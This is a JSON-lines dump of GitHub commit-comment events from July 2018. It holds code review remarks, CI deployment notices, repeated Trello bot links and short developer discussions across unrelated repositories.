{"id":"7903268922","type":"CommitCommentEvent","actor":{"login":"aksh1618"},"repo":{"name":"chay2199/GitHeat"},"payload":{"comment":{"id":29558548,"position":38,"line":38,"path":"Week-4/server.py","commit_id":"ddbaf1e417ba4b93375725082fae86419a52c8d1","created_at":"2018-07-01T16:06:45Z","updated_at":"2018-07-01T16:06:45Z","author_association":"NONE","body":"Use `sendall` or verify `send`'s return value with the file size."}},"created_at":"2018-07-01T16:06:45Z"}
{"id":"7903269678","type":"CommitCommentEvent","actor":{"login":"aksh1618"},"repo":{"name":"chay2199/GitHeat"},"payload":{"comment":{"id":29558550,"position":56,"line":56,"path":"Week-4/server.py","commit_id":"ddbaf1e417ba4b93375725082fae86419a52c8d1","created_at":"2018-07-01T16:07:21Z","updated_at":"2018-07-01T16:07:21Z","author_association":"NONE","body":"`sendall` or verification."}},"created_at":"2018-07-01T16:07:21Z"}
{"id":"7903270182","type":"CommitCommentEvent","actor":{"login":"mehulshahnj"},"repo":{"name":"mehulshahnj/gc-blockchain-app"},"payload":{"comment":{"id":29558551,"position":null,"line":null,"path":null,"commit_id":"0154775e7212dcb49a77af602dfbc2746921fea8","created_at":"2018-07-01T16:07:42Z","updated_at":"2018-07-01T16:07:42Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/3955c280-8a6e-4ed0-b7a5-6f30f95f589d?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/90d723e9-1ac3-490d-b08c-83526e6ac856?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\") deployed [gc-blockchain-app](https://github.com/mehulshahnj/gc-blockchain-app/releases/tag/deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180701-160742 \"deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180701-160742\") to [dev](https://console.bluemix.net/apps/05b5bf71-151c-4d61-8fb3-7a2147874202?env_id=ibm:yp:us-south \"ibm:yp:us-south:mehul@infinity-services.com:dev\"), including this commit"}},"created_at":"2018-07-01T16:07:42Z"}
{"id":"7903272568","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29558555,"position":null,"line":null,"path":null,"commit_id":"3fa36a3e609c227d4bd5e93bd02ac166d0c19429","created_at":"2018-07-01T16:09:27Z","updated_at":"2018-07-01T16:09:27Z","author_association":"COLLABORATOR","body":"Puzzle `1074-b36594a1` disappeared from [`src/main/java/com/zerocracy/pmo/banks/Zold.java`](https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/pmo/banks/Zold.java), that's why I closed #1079. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-01T16:09:27Z"}
{"id":"7903274222","type":"CommitCommentEvent","actor":{"login":"sba923"},"repo":{"name":"jeedom/core"},"payload":{"comment":{"id":29558556,"position":null,"line":null,"path":null,"commit_id":"e82770b3e72d6f5f938698d3c36980308a4a8b27","created_at":"2018-07-01T16:10:40Z","updated_at":"2018-07-01T16:10:40Z","author_association":"NONE","body":"With this change I can no longer install Jeedom on my Raspberry Pi 2 because php5-mbstring cannot be installed:\r\n\r\n\r\n```\r\n# apt-get -y install libapache2-mod-php5 php5 php5-common php5-curl php5-dev php5-gd php5-json php5-memcached php5-mysqlnd php5-cli php5-ssh2 php5-redis php5-mbstring\r\nReading package lists... Done\r\nBuilding dependency tree\r\nReading state information... Done\r\nE: Unable to locate package php5-mbstring\r\n\r\n```\r\n"}},"created_at":"2018-07-01T16:10:40Z"}
{"id":"7903274846","type":"CommitCommentEvent","actor":{"login":"Jeff5464"},"repo":{"name":"Jeff5464/QuizApp"},"payload":{"comment":{"id":29558557,"position":null,"line":null,"path":null,"commit_id":"7403ad77a7b43f317d297403e2a8d57f9d3677cf","created_at":"2018-07-01T16:11:09Z","updated_at":"2018-07-01T16:11:09Z","author_association":"OWNER","body":"https://drive.google.com/open?id=1J2UnJO3N7Meai0TQgAHcXsD0VR3MMYc7"}},"created_at":"2018-07-01T16:11:09Z"}
{"id":"7903277432","type":"CommitCommentEvent","actor":{"login":"ukoh"},"repo":{"name":"ukoh/ALC-QUIZ-APP"},"payload":{"comment":{"id":29558561,"position":2,"line":2,"path":"README.md","commit_id":"ee562646476683c6a1882928702224064707dd12","created_at":"2018-07-01T16:12:50Z","updated_at":"2018-07-01T16:12:50Z","author_association":"OWNER","body":"https://drive.google.com/file/d/1Qs8d78eQiwOucwWYrCvqyg_gMYugvrn3/view?usp=sharing\r\n\r\nAbove is my apk link from google drive"}},"created_at":"2018-07-01T16:12:50Z"}
{"id":"7903278857","type":"CommitCommentEvent","actor":{"login":"soulseekah"},"repo":{"name":"gravityview/GravityView"},"payload":{"comment":{"id":29558563,"position":null,"line":null,"path":null,"commit_id":"40fcd5e930855477af0f3733e2eae3252db54842","created_at":"2018-07-01T16:13:50Z","updated_at":"2018-07-01T16:13:50Z","author_association":"MEMBER","body":"Let's not return `null`, but instead return an empty array. This code started failing unit-tests because there are a couple of places where a `count` call is called on the results. In PHP 7.x this results in errors being thrown. I took the liberty of fixing this and on other place where `null` is being returned."}},"created_at":"2018-07-01T16:13:50Z"}
{"id":"7903279209","type":"CommitCommentEvent","actor":{"login":"Roman-n"},"repo":{"name":"revolucas/CoC-Xray"},"payload":{"comment":{"id":29558564,"position":null,"line":null,"path":null,"commit_id":"4a6702f9b1faff63b03de81785d5c3e75e05ac61","created_at":"2018-07-01T16:14:05Z","updated_at":"2018-07-01T16:14:05Z","author_association":"NONE","body":"Animation I did. There are several questions:\r\nnow there are additional animations -\r\n1) turn on / off the flashlight, now the flashlight can be activated in the option on a separate button, 2) the animation for the sight, if it's a gun. I wanted to do, as in this modification - https://www.youtube.com/watch?v=BStEEMrQtqk\r\nI also changed the animation for running, as well as on this video, but the problem is that the light from the flashlight shines somewhere behind the head of the main hero .. It is necessary to make so that the light would turn on and off, and shine from the bone flashlight.\r\nIf that - I have the source code - how it is done on SoC.\r\nLooks like this: https://www.youtube.com/watch?v=awc6PQtAOVk\r\nI wrote to you, on your forum."}},"created_at":"2018-07-01T16:14:05Z"}
{"id":"7903285002","type":"CommitCommentEvent","actor":{"login":"Sugisakii"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29558574,"position":null,"line":null,"path":null,"commit_id":"ec67aeec3970024805a06e07c2b24e92121332b5","created_at":"2018-07-01T16:18:10Z","updated_at":"2018-07-01T16:18:10Z","author_association":"NONE","body":"@cristinacke28 Why do not you share your AutoUpdate script?"}},"created_at":"2018-07-01T16:18:10Z"}
{"id":"7903285020","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"MaxArt1405/ASP.NET-Training"},"payload":{"comment":{"id":29558575,"position":35,"line":35,"path":"NET.S.2018.Kondratovich.03/NewtonsNthRoot/FindNthRoot.cs","commit_id":"c4117455206ccf2e0344fce2168ff998b52462ec","created_at":"2018-07-01T16:18:11Z","updated_at":"2018-07-01T16:18:11Z","author_association":"NONE","body":"- Где использован этот метод?"}},"created_at":"2018-07-01T16:18:11Z"}
{"id":"7903285068","type":"CommitCommentEvent","actor":{"login":"manandbytes"},"repo":{"name":"YegorMaksymchuk/song-word-counter"},"payload":{"comment":{"id":29558576,"position":7,"line":7,"path":".travis.yml","commit_id":"252b913255b0afa951556f83b1cefea989dc09da","created_at":"2018-07-01T16:18:12Z","updated_at":"2018-07-01T16:18:12Z","author_association":"NONE","body":"Is it still required to specify a default value for install? Before running the build, Travis CI installs dependencies in the same way, see https://docs.travis-ci.com/user/languages/java/#projects-using-maven"}},"created_at":"2018-07-01T16:18:12Z"}
{"id":"7903285150","type":"CommitCommentEvent","actor":{"login":"Hains"},"repo":{"name":"PLi-metas/BackupSuite"},"payload":{"comment":{"id":29558577,"position":null,"line":null,"path":null,"commit_id":"d64dc000a899c125a389360f705207617765330e","created_at":"2018-07-01T16:18:16Z","updated_at":"2018-07-01T16:18:16Z","author_association":"MEMBER","body":"I created a 'sumo' branch since this commit is for sumo and not for develop.\r\nI expect OpenPLi will merge sumo branch into develop branch soon.\r\nSumo has newer busybox (1.27.x) which don't understand 'ls -e'.\r\nWarning confirmed with dm8000 and fixed with this commit."}},"created_at":"2018-07-01T16:18:16Z"}
{"id":"7903285674","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"MaxArt1405/ASP.NET-Training"},"payload":{"comment":{"id":29558578,"position":60,"line":60,"path":"NET.S.2018.Kondratovich.03/NewtonsNthRoot/FindNthRoot.cs","commit_id":"c4117455206ccf2e0344fce2168ff998b52462ec","created_at":"2018-07-01T16:18:41Z","updated_at":"2018-07-01T16:18:41Z","author_association":"NONE","body":"if (eps <= 0 || eps >= 1)"}},"created_at":"2018-07-01T16:18:41Z"}
{"id":"7903286425","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"MaxArt1405/ASP.NET-Training"},"payload":{"comment":{"id":29558579,"position":13,"line":13,"path":"NET.S.2018.Kondratovich.03/NewtonsNthRoot/FindNthRoot.cs","commit_id":"c4117455206ccf2e0344fce2168ff998b52462ec","created_at":"2018-07-01T16:19:13Z","updated_at":"2018-07-01T16:19:13Z","author_association":"NONE","body":"- XML теги для обозначения возможных исключений."}},"created_at":"2018-07-01T16:19:13Z"}
{"id":"7903288214","type":"CommitCommentEvent","actor":{"login":"mehulshahnj"},"repo":{"name":"mehulshahnj/gc-blockchain-app"},"payload":{"comment":{"id":29558584,"position":null,"line":null,"path":null,"commit_id":"d3168dc755a981590505863edcc143840ed89e18","created_at":"2018-07-01T16:20:33Z","updated_at":"2018-07-01T16:20:33Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/3955c280-8a6e-4ed0-b7a5-6f30f95f589d?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/90d723e9-1ac3-490d-b08c-83526e6ac856?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\") deployed [gc-blockchain-app](https://github.com/mehulshahnj/gc-blockchain-app/releases/tag/deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180701-162032 \"deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180701-162032\") to [dev](https://console.bluemix.net/apps/2b3cef37-f2e3-4da5-8190-3022d089f1a0?env_id=ibm:yp:us-south \"ibm:yp:us-south:mehul@infinity-services.com:dev\"), including this commit"}},"created_at":"2018-07-01T16:20:33Z"}
{"id":"7903289884","type":"CommitCommentEvent","actor":{"login":"persianpros"},"repo":{"name":"PLi-metas/BackupSuite"},"payload":{"comment":{"id":29558586,"position":null,"line":null,"path":null,"commit_id":"d64dc000a899c125a389360f705207617765330e","created_at":"2018-07-01T16:21:48Z","updated_at":"2018-07-01T16:21:48Z","author_association":"MEMBER","body":"Thanks a lot and well done :)"}},"created_at":"2018-07-01T16:21:48Z"}
{"id":"7903299926","type":"CommitCommentEvent","actor":{"login":"Mouvedia"},"repo":{"name":"whatwg/xhr"},"payload":{"comment":{"id":29558606,"position":187,"line":272,"path":"Overview.html","commit_id":"7e8e1d887c2b16ba4665c849e7034a45ab826ec3","created_at":"2018-07-01T16:29:19Z","updated_at":"2018-07-01T16:29:19Z","author_association":"NONE","body":"`open` used to support 2 other signatures (3 and 4 arguments)."}},"created_at":"2018-07-01T16:29:19Z"}
{"id":"7903300103","type":"CommitCommentEvent","actor":{"login":"laracork"},"repo":{"name":"laracork/food"},"payload":{"comment":{"id":29558607,"position":5,"line":5,"path":"app/controllers/meals_controller.rb","commit_id":"20e552e5f908f7cbf03cff7bff5feaa33bfdbd97","created_at":"2018-07-01T16:29:28Z","updated_at":"2018-07-01T16:29:28Z","author_association":"OWNER","body":"Oh!! Yes, now I see it. Yup, this definitely threw an error immediately followed by me face palming myself. This one I knew.  @meals = Meal.all, cause the get request is calling all instances in the index"}},"created_at":"2018-07-01T16:29:28Z"}
{"id":"7903300836","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29558609,"position":null,"line":null,"path":null,"commit_id":"2d2e0637469b8c8c90bfb2c69a98f424b9930cef","created_at":"2018-07-01T16:30:02Z","updated_at":"2018-07-01T16:30:02Z","author_association":"NONE","body":"- Много лишних файлов в комите."}},"created_at":"2018-07-01T16:30:02Z"}
{"id":"7903303263","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29558613,"position":18,"line":18,"path":"NET.S.2018.Lyubchenko.03/RootCalculator/RootCalculator.cs","commit_id":"2d2e0637469b8c8c90bfb2c69a98f424b9930cef","created_at":"2018-07-01T16:31:40Z","updated_at":"2018-07-01T16:31:40Z","author_association":"NONE","body":"- Нет комметариев для исключений.\r\n - degree не double!"}},"created_at":"2018-07-01T16:31:40Z"}
{"id":"7903303476","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29558614,"position":null,"line":null,"path":null,"commit_id":"5240619b798a3027ada43404ea32f3816c89f8ad","created_at":"2018-07-01T16:31:50Z","updated_at":"2018-07-01T16:31:50Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Архитектура: подумать над тем, как организовывать архитектуру.](https://trello.com/c/pOpld1Ch/26-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D0%B0-%D0%BF%D0%BE%D0%B4%D1%83%D0%BC%D0%B0%D1%82%D1%8C-%D0%BD%D0%B0%D0%B4-%D1%82%D0%B5%D0%BC-%D0%BA%D0%B0%D0%BA-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%BE%D0%B2%D1%8B%D0%B2%D0%B0%D1%82%D1%8C-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D1%83)"}},"created_at":"2018-07-01T16:31:50Z"}
{"id":"7903303549","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29558615,"position":null,"line":null,"path":null,"commit_id":"5240619b798a3027ada43404ea32f3816c89f8ad","created_at":"2018-07-01T16:31:53Z","updated_at":"2018-07-01T16:31:53Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Архитектура: подумать над тем, как организовывать архитектуру.](https://trello.com/c/pOpld1Ch/26-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D0%B0-%D0%BF%D0%BE%D0%B4%D1%83%D0%BC%D0%B0%D1%82%D1%8C-%D0%BD%D0%B0%D0%B4-%D1%82%D0%B5%D0%BC-%D0%BA%D0%B0%D0%BA-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%BE%D0%B2%D1%8B%D0%B2%D0%B0%D1%82%D1%8C-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D1%83)"}},"created_at":"2018-07-01T16:31:53Z"}
{"id":"7903303631","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29558616,"position":null,"line":null,"path":null,"commit_id":"5240619b798a3027ada43404ea32f3816c89f8ad","created_at":"2018-07-01T16:31:56Z","updated_at":"2018-07-01T16:31:56Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Архитектура: подумать над тем, как организовывать архитектуру.](https://trello.com/c/pOpld1Ch/26-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D0%B0-%D0%BF%D0%BE%D0%B4%D1%83%D0%BC%D0%B0%D1%82%D1%8C-%D0%BD%D0%B0%D0%B4-%D1%82%D0%B5%D0%BC-%D0%BA%D0%B0%D0%BA-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%BE%D0%B2%D1%8B%D0%B2%D0%B0%D1%82%D1%8C-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D1%83)"}},"created_at":"2018-07-01T16:31:56Z"}
{"id":"7903303639","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29558617,"position":null,"line":null,"path":null,"commit_id":"5240619b798a3027ada43404ea32f3816c89f8ad","created_at":"2018-07-01T16:31:57Z","updated_at":"2018-07-01T16:31:57Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Архитектура: подумать над тем, как организовывать архитектуру.](https://trello.com/c/pOpld1Ch/26-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D0%B0-%D0%BF%D0%BE%D0%B4%D1%83%D0%BC%D0%B0%D1%82%D1%8C-%D0%BD%D0%B0%D0%B4-%D1%82%D0%B5%D0%BC-%D0%BA%D0%B0%D0%BA-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%BE%D0%B2%D1%8B%D0%B2%D0%B0%D1%82%D1%8C-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D1%83)"}},"created_at":"2018-07-01T16:31:57Z"}
{"id":"7903303641","type":"CommitCommentEvent","actor":{"login":"wkitty42"},"repo":{"name":"c172p-team/c172p"},"payload":{"comment":{"id":29558618,"position":null,"line":null,"path":null,"commit_id":"3ae6a0940f6a98a48b828f77d96de939f5ddaf84","created_at":"2018-07-01T16:31:57Z","updated_at":"2018-07-01T16:31:57Z","author_association":"CONTRIBUTOR","body":"On 07/01/2018 11:20 AM, Joshua Davidson wrote:\n> Yes, that was an example picture. I've never seen an attitude indicator matching \n> the one we have in FG anywhere on the internet (I've searched long and hard). \n\n\ni don't know where it came from but the attitude indicator we're using looks to \nbe a 3D model... at least it has an .ac file... the \"\"problem\"\" seems to come \nfrom the texture file for it...\n\n\nhttps://www.dropbox.com/s/yxukdd6z7sn2syt/20180701-c172p-attitude-indicator-textures-01.jpg?dl=0\n\n\nmaybe it is/was just a quick generic attitude indicator? there's no indication \nof the author or the date it was created in the .xml, either...\n\n"}},"created_at":"2018-07-01T16:31:57Z"}
{"id":"7903303650","type":"CommitCommentEvent","actor":{"login":"Sugisakii"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29558619,"position":null,"line":null,"path":null,"commit_id":"15c12639fbb4c583c0d55182058dcc10b5254578","created_at":"2018-07-01T16:31:57Z","updated_at":"2018-07-01T16:31:57Z","author_association":"NONE","body":"@uNMaRsun I have done a script of autoupdate, without having to come to github to download it, it does it only when they upload an update\r\n\r\nhttps://github.com/Sugisakii/SteamDB-SalientCheat-AutoUpdate"}},"created_at":"2018-07-01T16:31:57Z"}
{"id":"7903303916","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29558622,"position":null,"line":null,"path":null,"commit_id":"5240619b798a3027ada43404ea32f3816c89f8ad","created_at":"2018-07-01T16:32:09Z","updated_at":"2018-07-01T16:32:09Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Архитектура: подумать над тем, как организовывать архитектуру.](https://trello.com/c/pOpld1Ch/26-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D0%B0-%D0%BF%D0%BE%D0%B4%D1%83%D0%BC%D0%B0%D1%82%D1%8C-%D0%BD%D0%B0%D0%B4-%D1%82%D0%B5%D0%BC-%D0%BA%D0%B0%D0%BA-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%BE%D0%B2%D1%8B%D0%B2%D0%B0%D1%82%D1%8C-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D1%83)"}},"created_at":"2018-07-01T16:32:09Z"}
{"id":"7903304085","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29558623,"position":null,"line":null,"path":null,"commit_id":"216ca25677b844bfef78cd190239d230988154d2","created_at":"2018-07-01T16:32:15Z","updated_at":"2018-07-01T16:32:15Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Архитектура: подумать над тем, как организовывать архитектуру.](https://trello.com/c/pOpld1Ch/26-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D0%B0-%D0%BF%D0%BE%D0%B4%D1%83%D0%BC%D0%B0%D1%82%D1%8C-%D0%BD%D0%B0%D0%B4-%D1%82%D0%B5%D0%BC-%D0%BA%D0%B0%D0%BA-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%BE%D0%B2%D1%8B%D0%B2%D0%B0%D1%82%D1%8C-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D1%83)"}},"created_at":"2018-07-01T16:32:15Z"}
{"id":"7903304101","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29558624,"position":null,"line":null,"path":null,"commit_id":"5240619b798a3027ada43404ea32f3816c89f8ad","created_at":"2018-07-01T16:32:16Z","updated_at":"2018-07-01T16:32:16Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Архитектура: подумать над тем, как организовывать архитектуру.](https://trello.com/c/pOpld1Ch/26-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D0%B0-%D0%BF%D0%BE%D0%B4%D1%83%D0%BC%D0%B0%D1%82%D1%8C-%D0%BD%D0%B0%D0%B4-%D1%82%D0%B5%D0%BC-%D0%BA%D0%B0%D0%BA-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%BE%D0%B2%D1%8B%D0%B2%D0%B0%D1%82%D1%8C-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D1%83)"}},"created_at":"2018-07-01T16:32:16Z"}
{"id":"7903304190","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29558625,"position":20,"line":20,"path":"NET.S.2018.Lyubchenko.03/RootCalculator/RootCalculator.cs","commit_id":"2d2e0637469b8c8c90bfb2c69a98f424b9930cef","created_at":"2018-07-01T16:32:21Z","updated_at":"2018-07-01T16:32:21Z","author_association":"NONE","body":"-  Не очень удачное название для метода"}},"created_at":"2018-07-01T16:32:21Z"}
{"id":"7903304318","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29558626,"position":null,"line":null,"path":null,"commit_id":"5240619b798a3027ada43404ea32f3816c89f8ad","created_at":"2018-07-01T16:32:27Z","updated_at":"2018-07-01T16:32:27Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Архитектура: подумать над тем, как организовывать архитектуру.](https://trello.com/c/pOpld1Ch/26-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D0%B0-%D0%BF%D0%BE%D0%B4%D1%83%D0%BC%D0%B0%D1%82%D1%8C-%D0%BD%D0%B0%D0%B4-%D1%82%D0%B5%D0%BC-%D0%BA%D0%B0%D0%BA-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%BE%D0%B2%D1%8B%D0%B2%D0%B0%D1%82%D1%8C-%D0%B0%D1%80%D1%85%D0%B8%D1%82%D0%B5%D0%BA%D1%82%D1%83%D1%80%D1%83)"}},"created_at":"2018-07-01T16:32:27Z"}
{"id":"7903305318","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29558627,"position":21,"line":21,"path":"NET.S.2018.Lyubchenko.03/RootCalculator/RootCalculator.cs","commit_id":"2d2e0637469b8c8c90bfb2c69a98f424b9930cef","created_at":"2018-07-01T16:33:17Z","updated_at":"2018-07-01T16:33:17Z","author_association":"NONE","body":"- x0, x - заменить на что-то а-ля  next, previous, current..."}},"created_at":"2018-07-01T16:33:17Z"}
{"id":"7903305639","type":"CommitCommentEvent","actor":{"login":"powersee"},"repo":{"name":"powersee/ver"},"payload":{"comment":{"id":29558628,"position":null,"line":null,"path":null,"commit_id":"3213143ed1543e9dfa9768c5a3c4296bfacf46be","created_at":"2018-07-01T16:33:31Z","updated_at":"2018-07-01T16:33:31Z","author_association":"OWNER","body":"一个打开就进入Google首页的APP"}},"created_at":"2018-07-01T16:33:31Z"}
{"id":"7903306083","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29558629,"position":40,"line":40,"path":"NET.S.2018.Lyubchenko.03/RootCalculator/RootCalculator.cs","commit_id":"2d2e0637469b8c8c90bfb2c69a98f424b9930cef","created_at":"2018-07-01T16:33:52Z","updated_at":"2018-07-01T16:33:52Z","author_association":"NONE","body":"- Math.Pow "}},"created_at":"2018-07-01T16:33:52Z"}
{"id":"7903307414","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29558631,"position":59,"line":59,"path":"NET.S.2018.Lyubchenko.03/RootCalculator/RootCalculator.cs","commit_id":"2d2e0637469b8c8c90bfb2c69a98f424b9930cef","created_at":"2018-07-01T16:34:50Z","updated_at":"2018-07-01T16:34:50Z","author_association":"NONE","body":" private static double Equation(double number, double degree, double x0)\r\n         => (1 / degree) * (((degree - 1) * x0) + (number / Pow(x0, (int)degree - 1)));\r\n\r\nтолько degree не double!"}},"created_at":"2018-07-01T16:34:50Z"}
{"id":"7903308080","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29558632,"position":87,"line":87,"path":"NET.S.2018.Lyubchenko.03/RootCalculator/RootCalculator.cs","commit_id":"2d2e0637469b8c8c90bfb2c69a98f424b9930cef","created_at":"2018-07-01T16:35:20Z","updated_at":"2018-07-01T16:35:20Z","author_association":"NONE","body":"if (precision <= 0 || precision >= 1)"}},"created_at":"2018-07-01T16:35:20Z"}
{"id":"7903309405","type":"CommitCommentEvent","actor":{"login":"lcatip00"},"repo":{"name":"monikabuz/pis-lab1"},"payload":{"comment":{"id":29558634,"position":5,"line":14,"path":"lab/Program.cs","commit_id":"dfc4ab24fd6dfdef89c727d758d2845c916b8150","created_at":"2018-07-01T16:36:18Z","updated_at":"2018-07-01T16:36:18Z","author_association":"COLLABORATOR","body":"//cao"}},"created_at":"2018-07-01T16:36:18Z"}
{"id":"7903310112","type":"CommitCommentEvent","actor":{"login":"lcatip00"},"repo":{"name":"monikabuz/pis-lab1"},"payload":{"comment":{"id":29558637,"position":null,"line":null,"path":null,"commit_id":"dfc4ab24fd6dfdef89c727d758d2845c916b8150","created_at":"2018-07-01T16:36:51Z","updated_at":"2018-07-01T16:36:51Z","author_association":"COLLABORATOR","body":"napisala sam ti komentar\r\n"}},"created_at":"2018-07-01T16:36:51Z"}
{"id":"7903310277","type":"CommitCommentEvent","actor":{"login":"joolswills"},"repo":{"name":"RetroPie/RetroPie-Setup"},"payload":{"comment":{"id":29558638,"position":null,"line":null,"path":null,"commit_id":"336f1398c7040f39ae057338978a739ffe8a5a60","created_at":"2018-07-01T16:36:59Z","updated_at":"2018-07-01T16:36:59Z","author_association":"MEMBER","body":"I reverted this as it broke building on 32bit Ubuntu - however it's possible my fix causes issues again with older ubuntu. Which version was this a problem with as you don't state in your commit ? Seemed to be ok on my 18.04"}},"created_at":"2018-07-01T16:36:59Z"}
{"id":"7903310920","type":"CommitCommentEvent","actor":{"login":"retro-wertz"},"repo":{"name":"libretro/beetle-psx-libretro"},"payload":{"comment":{"id":29558640,"position":null,"line":null,"path":null,"commit_id":"a8aa726b38d2e39a284360c1d6cf04d79fe57d98","created_at":"2018-07-01T16:37:29Z","updated_at":"2018-07-01T16:37:29Z","author_association":"CONTRIBUTOR","body":"is this the patch for this issue like this vertical line in front?\r\n\r\n![screenshot](https://user-images.githubusercontent.com/23315382/42136540-0960e1f8-7d90-11e8-9325-7995e9cb941f.png)\r\n\r\n@twinaphex"}},"created_at":"2018-07-01T16:37:29Z"}
{"id":"7903311278","type":"CommitCommentEvent","actor":{"login":"uNMaRsun"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29558641,"position":null,"line":null,"path":null,"commit_id":"15c12639fbb4c583c0d55182058dcc10b5254578","created_at":"2018-07-01T16:37:47Z","updated_at":"2018-07-01T16:37:47Z","author_association":"NONE","body":"@Sugisakii Thx mate, but I'm near 25 lvl, not need autoupdate."}},"created_at":"2018-07-01T16:37:47Z"}
